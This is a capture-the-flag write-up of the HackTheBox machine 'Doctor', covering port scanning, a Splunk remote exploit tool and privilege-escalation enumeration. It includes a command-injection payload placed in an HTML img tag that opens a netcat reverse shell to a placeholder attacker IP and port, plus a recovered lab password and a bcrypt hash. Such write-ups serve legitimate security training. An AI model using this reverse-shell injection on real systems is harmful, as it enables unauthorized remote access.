CTF-Writeups/HackTheBox/Doctor.md
2020-11-18 15:49:09 +05:00

100 lines
No EOL
3 KiB
Markdown

# HackTheBox-Doctor
## NMAP
```
Nmap scan report for 10.10.10.209
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after: 2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## PORT 80
<img src="https://imgur.com/byFNRNC.png"/>
Looking at source code we see a domain name `doctors.htb`
<img src="https://imgur.com/XBNWOzc.png"/>
So let's try to add this on to our `/etc/hosts`
<img src="https://imgur.com/S0jQu4X.png"/>
## doctors.htb
<img src="https://imgur.com/fgUDmyL.png"/>
We can register and login with an account but it's not really useful
## PORT 8089
<img src="https://imgur.com/S4Iafvg.png"/>
I tried searching for default credentials for `splunkd` beacause for navigating to `servicesNS` credentials are required so I tried `admin:admin` and `admin:changeme` but didn't worked
Then I found this repository on GitHub
<img src="https://imgur.com/lt10mJd.png"/>
We are going to use `PySplunkWhisperer2_remote` because it's not being hosted on our machine
But this would not work becasue we need the credentials so I head over back to `doctors.htb` logged in as a new user at this point I didn't do it myself I had a little help from discord server
`<img src=http://IP/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'IP'$IFS'PORT')>`
<img src="https://imgur.com/wlMMBqk.png"/>
I didn't find anything on the box through manual enumeration so going to go with `linpeas`
<img src="https://imgur.com/MbdWgLO.png"/>
<img src="https://imgur.com/X6uDeig.png"/>
This was the only interesting thing that `linpeas` found
Reading `/var/log/apache2/backup`
<img src="https://imgur.com/ctoci6w.png"/>
`email=Guitar123`
Now I tried this at `doctors.htb/login` to reset the password but there was no email registered with this
By ruuning linpeas and found that there is a user named `shaun` so I guessed maybe this would be his password and I logged in with `shaun`
<img src=https://imgur.com/EKTuTGh.png/>
<img src="https://imgur.com/DiJJlpW.png"/>
Then I again ran `linpeas`
<img src="https://imgur.com/UqNF3JG.png"/>
And found some credentials in form of `bcrypt` hash
`$2b$12$Tg2b8u/elwAyfQOvqvxJgOTcsbnkFANIDdv6jVXmxiWsg4IznjI0S`
But I could not crack this so I then returned to that exploit that we found and ran `python3 PySplunkWhisperer2_remote.py`
<img src="https://imgur.com/X8OTA3p.png"/>
So this means that we are authenticated and now only need to include the payload
<img src="https://imgur.com/TkGzdYr.png"/>
And we are done , this wasn't really an "Easy" machine . Coming from TryHackMe , HackTheBox is way more diffcult